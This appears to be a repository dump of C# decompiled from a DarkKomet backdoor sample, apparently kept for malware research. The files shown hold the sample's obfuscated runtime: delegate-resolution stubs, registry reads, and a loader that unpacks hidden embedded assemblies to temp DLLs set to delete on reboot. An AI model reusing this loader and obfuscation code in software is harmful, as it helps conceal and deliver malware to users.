// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u0007;
using \u007F\u0004;
using System;
using System.Reflection;
using System.Reflection.Emit;
using System.Runtime.InteropServices;
namespace \u0007
{
internal static class \u0006
{
private static ModuleHandle \u0001;
private static char[] \u0002;
public static void \u0003\u0002([In] int obj0)
{
Type typeFromHandle;
FieldInfo[] fields;
int index1;
FieldInfo fieldInfo;
string name;
bool flag;
int num1;
int index2;
char ch;
int index3;
MethodInfo methodFromHandle;
Delegate @delegate;
ParameterInfo[] parameters;
int length;
Type[] parameterTypes;
int index4;
DynamicMethod dynamicMethod;
ILGenerator ilGenerator;
int num2;
try
{
try
{
typeFromHandle = Type.GetTypeFromHandle(\u0006.\u0001.ResolveTypeHandle(33554433 + obj0));
}
catch
{
return;
}
fields = typeFromHandle.GetFields(BindingFlags.Static | BindingFlags.NonPublic | BindingFlags.GetField);
for (index1 = 0; index1 < fields.Length; ++index1)
{
fieldInfo = fields[index1];
name = fieldInfo.Name;
flag = false;
num1 = 0;
for (index2 = name.Length - 1; index2 >= 0; --index2)
{
ch = name[index2];
if (ch == '~')
{
flag = true;
break;
}
for (index3 = 0; index3 < 58; ++index3)
{
if ((int) \u0006.\u0002[index3] == (int) ch)
{
num1 = num1 * 58 + index3;
break;
}
}
}
try
{
methodFromHandle = (MethodInfo) MethodBase.GetMethodFromHandle(\u0006.\u0001.ResolveMethodHandle(num1 + 167772161));
}
catch
{
continue;
}
if (methodFromHandle.IsStatic)
{
try
{
@delegate = Delegate.CreateDelegate(fieldInfo.FieldType, methodFromHandle);
}
catch (Exception ex)
{
continue;
}
}
else
{
parameters = methodFromHandle.GetParameters();
length = parameters.Length + 1;
parameterTypes = new Type[length];
parameterTypes[0] = typeof (object);
for (index4 = 1; index4 < length; ++index4)
parameterTypes[index4] = parameters[index4 - 1].ParameterType;
dynamicMethod = new DynamicMethod(string.Empty, methodFromHandle.ReturnType, parameterTypes, typeFromHandle, true);
ilGenerator = dynamicMethod.GetILGenerator();
ilGenerator.Emit(OpCodes.Ldarg_0);
if (length > 1)
ilGenerator.Emit(OpCodes.Ldarg_1);
if (length > 2)
ilGenerator.Emit(OpCodes.Ldarg_2);
if (length > 3)
ilGenerator.Emit(OpCodes.Ldarg_3);
if (length > 4)
{
for (num2 = 4; num2 < length; ++num2)
ilGenerator.Emit(OpCodes.Ldarg_S, num2);
}
ilGenerator.Emit(flag ? OpCodes.Callvirt : OpCodes.Call, methodFromHandle);
ilGenerator.Emit(OpCodes.Ret);
try
{
@delegate = dynamicMethod.CreateDelegate(typeFromHandle);
}
catch
{
continue;
}
}
try
{
fieldInfo.SetValue((object) null, (object) @delegate);
}
catch
{
}
}
}
catch (Exception ex)
{
object[] objArray = new object[20]
{
(object) typeFromHandle,
(object) fieldInfo,
(object) name,
(object) flag,
(object) num1,
(object) index2,
(object) ch,
(object) index3,
(object) methodFromHandle,
(object) @delegate,
(object) parameters,
(object) length,
(object) parameterTypes,
(object) index4,
(object) dynamicMethod,
(object) ilGenerator,
(object) num2,
(object) fields,
(object) index1,
(object) obj0
};
\u0089\u0004.\u0081\u0005(ex, objArray);
throw;
}
}
static \u0006()
{
Type type1;
try
{
\u0006.\u0002 = new char[58]
{
'\u0001',
'\u0002',
'\u0003',
'\u0004',
'\u0005',
'\u0006',
'\a',
'\b',
'\u000E',
'\u000F',
'\u0010',
'\u0011',
'\u0012',
'\u0013',
'\u0014',
'\u0015',
'\u0016',
'\u0017',
'\u0018',
'\u0019',
'\u001A',
'\u001B',
'\u001C',
'\u001D',
'\u001E',
'\u001F',
'\u007F',
'\u0080',
'\u0081',
'\u0082',
'\u0083',
'\u0084',
'\u0086',
'\u0087',
'\u0088',
'\u0089',
'\u008A',
'\u008B',
'\u008C',
'\u008D',
'\u008E',
'\u008F',
'\u0090',
'\u0091',
'\u0092',
'\u0093',
'\u0094',
'\u0095',
'\u0096',
'\u0097',
'\u0098',
'\u0099',
'\u009A',
'\u009B',
'\u009C',
'\u009D',
'\u009E',
'\u009F'
};
type1 = typeof (MulticastDelegate);
if ((object) type1 == null)
return;
\u0006.\u0001 = Assembly.GetExecutingAssembly().GetModules()[0].ModuleHandle;
}
catch (Exception ex)
{
Type type2 = type1;
\u0089\u0004.\u0018\u0005(ex, (object) type2);
throw;
}
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0007_0003.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
using System.Runtime.InteropServices;
internal delegate object \u0007\u0003([In] Type obj0, [In] bool obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0007_0004.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using Microsoft.Win32;
using System.Runtime.InteropServices;
internal delegate RegistryKey \u0007\u0004([In] object obj0, [In] string obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0008/_0006_0002.cs
+81
View File
@@ -0,0 +1,81 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u0003;
using \u0008;
using Microsoft.Win32;
namespace \u0008
{
internal class \u0006\u0002
{
public static string \u0006\u0002()
{
string str1;
try
{
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey(\u001E\u0004.\u0006\u0002());
if (true)
goto label_9;
label_1:
if (false)
goto label_4;
else
goto label_13;
label_2:
RegistryKey registryKey2 = \u0007\u0004.\u007E\u0099\u0005((object) Registry.LocalMachine, \u001E\u0004.\u001E\u0004());
RegistryKey registryKey3;
if (true)
registryKey3 = registryKey2;
label_3:
if (registryKey3 != null)
{
string str2 = (string) \u0008\u0004.\u007E\u009A\u0005((object) registryKey3, \u0002.\u0002\u0002(114), (object) null);
if (true)
goto label_12;
label_8:
\u001A\u0002.\u007E\u0098\u0005((object) registryKey3);
string str3;
str1 = str3;
goto label_15;
label_12:
str3 = str2;
goto label_8;
}
label_4:
if (true)
goto label_11;
label_5:
if (true)
{
if (false)
goto label_2;
else
goto label_15;
}
else
goto label_1;
label_11:
str1 = (string) null;
goto label_5;
label_13:
if (registryKey3 != null)
goto label_3;
else
goto label_2;
label_9:
registryKey3 = registryKey1;
goto label_1;
}
catch
{
str1 = (string) null;
}
label_15:
return str1;
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0008/_0008.cs
+31
View File
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u0003;
using System;
using System.Runtime.CompilerServices;
namespace \u0008
{
internal sealed class \u0008
{
[SpecialName]
public static string \u0006\u0002() => \u0008.\u0008.\u001E\u0004() + \u0002.\u0002\u0002(75) + (object) \u0008.\u0008.\u0006\u0002();
[SpecialName]
public static int \u0006\u0002()
{
Version version1 = new Version(\u0002.\u0002\u0002(80));
Version version2;
if (true)
version2 = version1;
return version2.Major;
}
[SpecialName]
public static string \u001E\u0004() => \u0002.\u0002\u0002(93);
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0008/_00082.cs
+330
View File
@@ -0,0 +1,330 @@
// Decompiled with JetBrains decompiler
// Type: .2
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u0008;
using \u0012;
using \u007F\u0004;
using System;
using System.Collections;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace \u0008
{
internal class \u00082
{
private static Hashtable \u0001;
[DllImport("kernel32", EntryPoint = "MoveFileEx")]
private static extern bool \u0006\u0002([In] string obj0, [In] string obj1, [In] int obj2);
internal static void \u0006\u0002()
{
try
{
try
{
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u00082.\u0006\u0002);
}
catch
{
}
}
catch (Exception ex)
{
\u0089\u0004.\u0017\u0005(ex);
throw;
}
}
internal static Assembly \u0006\u0002([In] object obj0, [In] ResolveEventArgs obj1)
{
\u00082.\u0008 obj;
string s;
string base64String;
char[] chArray;
string[] strArray;
string str1;
bool flag1;
bool flag2;
int index1;
int index2;
int num;
string str2;
Hashtable hashtable;
Assembly assembly1;
Stream manifestResourceStream;
int length;
byte[] numArray;
Assembly assembly2;
string path1;
string path2;
FileStream fileStream;
try
{
obj = new \u00082.\u0008(obj1.Name);
s = obj.\u0006\u0002(false);
base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(s));
chArray = new char[1]{ ',' };
strArray = "ezE0ZWUxOWU0LTIxOTMtNDNhNC1hNWJiLTg0MDA4Nzc4ZWE1Zn0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{14ee19e4-2193-43a4-a5bb-84008778ea5f},ezNiNWIwMjY2LTcwMDUtNDU5MC04NTI5LTk4MjdmZjUxZWZiMX0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{3b5b0266-7005-4590-8529-9827ff51efb1}".Split(chArray);
str1 = string.Empty;
flag1 = false;
flag2 = false;
for (index1 = 0; index1 < strArray.Length - 1; index1 += 2)
{
if (strArray[index1] == base64String)
{
str1 = strArray[index1 + 1];
break;
}
}
if (str1.Length == 0 && obj.\u0004.Length == 0)
{
base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0001));
for (index2 = 0; index2 < strArray.Length - 1; index2 += 2)
{
if (strArray[index2] == base64String)
{
str1 = strArray[index2 + 1];
break;
}
}
}
if (str1.Length > 0)
{
if (str1[0] == '[')
{
num = str1.IndexOf(']');
str2 = str1.Substring(1, num - 1);
flag1 = str2.IndexOf('z') >= 0;
flag2 = str2.IndexOf('t') >= 0;
str1 = str1.Substring(num + 1);
}
Monitor.Enter((object) (hashtable = \u00082.\u0001));
try
{
if (\u00082.\u0001.ContainsKey((object) str1))
{
assembly1 = (Assembly) \u00082.\u0001[(object) str1];
}
else
{
manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str1);
if (manifestResourceStream != null)
{
length = (int) manifestResourceStream.Length;
numArray = new byte[length];
manifestResourceStream.Read(numArray, 0, length);
if (flag1)
numArray = \u0014.\u0010\u0002(numArray);
assembly2 = (Assembly) null;
if (!flag2)
{
try
{
assembly2 = Assembly.Load(numArray);
}
catch (FileLoadException ex)
{
flag2 = true;
}
catch (BadImageFormatException ex)
{
flag2 = true;
}
}
if (flag2)
{
try
{
path1 = string.Format("{0}{1}\\", (object) Path.GetTempPath(), (object) str1);
Directory.CreateDirectory(path1);
path2 = path1 + obj.\u0001 + ".dll";
if (!File.Exists(path2))
{
fileStream = File.OpenWrite(path2);
fileStream.Write(numArray, 0, numArray.Length);
fileStream.Close();
\u00082.\u0006\u0002(path2, (string) null, 4);
\u00082.\u0006\u0002(path1, (string) null, 4);
}
assembly2 = Assembly.LoadFile(path2);
}
catch
{
}
}
\u00082.\u0001[(object) str1] = (object) assembly2;
assembly1 = assembly2;
}
else
goto label_31;
}
}
finally
{
Monitor.Exit((object) hashtable);
}
return assembly1;
}
label_31:
return (Assembly) null;
}
catch (Exception ex)
{
object[] objArray = new object[23]
{
(object) obj,
(object) s,
(object) base64String,
(object) strArray,
(object) str1,
(object) flag1,
(object) flag2,
(object) index1,
(object) index2,
(object) num,
(object) str2,
(object) manifestResourceStream,
(object) length,
(object) numArray,
(object) assembly2,
(object) path1,
(object) path2,
(object) fileStream,
(object) assembly1,
(object) chArray,
(object) hashtable,
obj0,
(object) obj1
};
\u0089\u0004.\u0081\u0005(ex, objArray);
throw;
}
}
public \u00082()
{
try
{
}
catch (Exception ex)
{
\u0089\u0004.\u0018\u0005(ex, (object) this);
throw;
}
}
static \u00082()
{
try
{
\u00082.\u0001 = new Hashtable();
}
catch (Exception ex)
{
\u0089\u0004.\u0017\u0005(ex);
throw;
}
}
internal struct \u0008
{
public string \u0001;
public Version \u0002;
public string \u0003;
public string \u0004;
public string \u0006\u0002([In] bool obj0)
{
StringBuilder stringBuilder1;
try
{
stringBuilder1 = new StringBuilder();
stringBuilder1.Append(this.\u0001);
if (obj0 && this.\u0002 != (Version) null)
{
stringBuilder1.Append(", Version=");
stringBuilder1.Append((object) this.\u0002);
}
stringBuilder1.Append(", Culture=");
stringBuilder1.Append(this.\u0003.Length == 0 ? "neutral" : this.\u0003);
stringBuilder1.Append(", PublicKeyToken=");
stringBuilder1.Append(this.\u0004.Length == 0 ? "null" : this.\u0004);
return stringBuilder1.ToString();
}
catch (Exception ex)
{
StringBuilder stringBuilder2 = stringBuilder1;
// ISSUE: variable of a boxed type
__Boxed<\u00082.\u0008> local1 = (ValueType) this;
// ISSUE: variable of a boxed type
__Boxed<bool> local2 = (ValueType) obj0;
\u0089\u0004.\u001A\u0005(ex, (object) stringBuilder2, (object) local1, (object) local2);
throw;
}
}
public \u0008([In] string obj0)
{
char[] chArray1;
string[] strArray1;
int index;
string str1;
string str2;
try
{
this.\u0002 = (Version) null;
this.\u0003 = string.Empty;
this.\u0004 = string.Empty;
this.\u0001 = string.Empty;
string str3 = obj0;
chArray1 = new char[1]{ ',' };
char[] chArray2 = chArray1;
strArray1 = str3.Split(chArray2);
for (index = 0; index < strArray1.Length; ++index)
{
str1 = strArray1[index];
str2 = str1.Trim();
if (str2.StartsWith("Version="))
this.\u0002 = new Version(str2.Substring(8));
else if (str2.StartsWith("Culture="))
{
this.\u0003 = str2.Substring(8);
if (this.\u0003 == "neutral")
this.\u0003 = string.Empty;
}
else if (str2.StartsWith("PublicKeyToken="))
{
this.\u0004 = str2.Substring(15);
if (this.\u0004 == "null")
this.\u0004 = string.Empty;
}
else
this.\u0001 = str2;
}
}
catch (Exception ex)
{
string str4 = str1;
string str5 = str2;
char[] chArray3 = chArray1;
string[] strArray2 = strArray1;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) index;
// ISSUE: variable of a boxed type
__Boxed<\u00082.\u0008> local2 = (ValueType) this;
string str6 = obj0;
\u0089\u0004.\u001E\u0005(ex, (object) str4, (object) str5, (object) chArray3, (object) strArray2, (object) local1, (object) local2, (object) str6);
throw;
}
}
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0008/_00083.cs
+152
View File
@@ -0,0 +1,152 @@
// Decompiled with JetBrains decompiler
// Type: .3
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u0008;
using \u007F\u0004;
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;
namespace \u0008
{
internal class \u00083
{
private static Assembly \u0001;
private static string[] \u0002;
internal static void \u0006\u0002()
{
try
{
try
{
AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\u00083.\u0006\u0002);
}
catch (Exception ex)
{
}
}
catch (Exception ex)
{
\u0089\u0004.\u0017\u0005(ex);
throw;
}
}
private static Assembly \u0006\u0002([In] object obj0, [In] ResolveEventArgs obj1)
{
string[] strArray1;
string name;
int index;
try
{
if ((object) \u00083.\u0001 == null)
{
Monitor.Enter((object) (strArray1 = \u00083.\u0002));
try
{
\u00083.\u0001 = Assembly.Load("{3b5b0266-7005-4590-8529-9827ff51efb1}, PublicKeyToken=3e56350693f7355e");
if ((object) \u00083.\u0001 != null)
\u00083.\u0002 = \u00083.\u0001.GetManifestResourceNames();
}
finally
{
Monitor.Exit((object) strArray1);
}
}
name = obj1.Name;
for (index = 0; index < \u00083.\u0002.Length; ++index)
{
if (\u00083.\u0002[index] == name)
return !\u00083.\u0006\u0002() ? (Assembly) null : \u00083.\u0001;
}
return (Assembly) null;
}
catch (Exception ex)
{
string str = name;
// ISSUE: variable of a boxed type
__Boxed<int> local = (ValueType) index;
string[] strArray2 = strArray1;
object obj = obj0;
ResolveEventArgs resolveEventArgs = obj1;
\u0089\u0004.\u001C\u0005(ex, (object) str, (object) local, (object) strArray2, obj, (object) resolveEventArgs);
throw;
}
}
private static bool \u0006\u0002()
{
int index;
StackFrame[] frames;
StackFrame stackFrame1;
try
{
bool flag;
try
{
frames = new StackTrace().GetFrames();
for (index = 2; index < frames.Length; ++index)
{
stackFrame1 = frames[index];
if ((object) stackFrame1.GetMethod().Module.Assembly == (object) Assembly.GetExecutingAssembly())
{
flag = true;
goto label_7;
}
}
flag = false;
}
catch
{
flag = true;
}
label_7:
return flag;
}
catch (Exception ex)
{
StackFrame[] stackFrameArray = frames;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) index;
StackFrame stackFrame2 = stackFrame1;
bool flag;
// ISSUE: variable of a boxed type
__Boxed<bool> local2 = (ValueType) flag;
\u0089\u0004.\u001B\u0005(ex, (object) stackFrameArray, (object) local1, (object) stackFrame2, (object) local2);
throw;
}
}
public \u00083()
{
try
{
}
catch (Exception ex)
{
\u0089\u0004.\u0018\u0005(ex, (object) this);
throw;
}
}
static \u00083()
{
try
{
\u00083.\u0001 = (Assembly) null;
\u00083.\u0002 = new string[0];
}
catch (Exception ex)
{
\u0089\u0004.\u0017\u0005(ex);
throw;
}
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0008/_00084.cs
+21
View File
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: .4
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u0008;
using System.Runtime.InteropServices;
namespace \u0008
{
internal sealed class \u00084
{
internal static \u00084.\u0008 \u0001;
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0008
{
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0008/_001E_0004.cs
+20
View File
@@ -0,0 +1,20 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u0003;
using System.Runtime.CompilerServices;
namespace \u0008
{
internal sealed class \u001E\u0004
{
[SpecialName]
public static string \u0006\u0002() => \u0002.\u0002\u0002(123) + \u0008.\u0008.\u0006\u0002();
[SpecialName]
public static string \u001E\u0004() => \u0002.\u0002\u0002(148) + \u0008.\u0008.\u0006\u0002();
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0008_0003.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
using System.Runtime.InteropServices;
internal delegate void \u0008\u0003([In] object obj0, [In] ResolveEventHandler obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0008_0004.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate object \u0008\u0004([In] object obj0, [In] string obj1, [In] object obj2);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_000E/_007F.cs
+99
View File
@@ -0,0 +1,99 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u000E;
using System.Runtime.InteropServices;
namespace \u000E
{
internal sealed class \u007F
{
internal static \u007F.\u0080 \u0001;
internal static \u007F.\u0081 \u0002;
internal static \u007F.\u0082 \u0003;
internal static \u007F.\u0083 \u0004;
internal static \u007F.\u0084 \u0005;
internal static \u007F.\u0086 \u0006;
internal static \u007F.\u0087 \u0007;
internal static \u007F.\u0088 \u0008;
internal static \u007F.\u0089 \u000E;
internal static \u007F.\u008A \u000F;
internal static \u007F.\u008B \u0010;
internal static \u007F.\u008C \u0011;
internal static \u007F.\u008D \u0012;
internal static \u007F.\u008E \u0013;
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
private struct \u0080
{
}
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
private struct \u0081
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0082
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0083
{
}
[StructLayout(LayoutKind.Explicit, Size = 1024, Pack = 1)]
private struct \u0084
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0086
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0087
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0088
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0089
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u008A
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u008B
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u008C
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u008D
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u008E
{
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_000E_0003.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
internal delegate AppDomain \u000E\u0003();
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_000E_0004.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
using System.Runtime.InteropServices;
internal delegate int \u000E\u0004([In] Type obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_000F_0003.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Reflection;
using System.Runtime.InteropServices;
internal delegate Assembly[] \u000F\u0003([In] object obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_000F_0004.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate long \u000F\u0004([In] object obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0010/_000F.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u0008;
using \u007F\u0004;
using System;
namespace \u0010
{
internal class \u000F
{
public static void \u0005\u0002()
{
try
{
try
{
\u00083.\u0006\u0002();
}
catch (Exception ex)
{
}
}
catch (Exception ex)
{
\u0089\u0004.\u0017\u0005(ex);
throw;
}
}
public \u000F()
{
try
{
}
catch (Exception ex)
{
\u0089\u0004.\u0018\u0005(ex, (object) this);
throw;
}
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0010_0003.cs
+10
View File
@@ -0,0 +1,10 @@
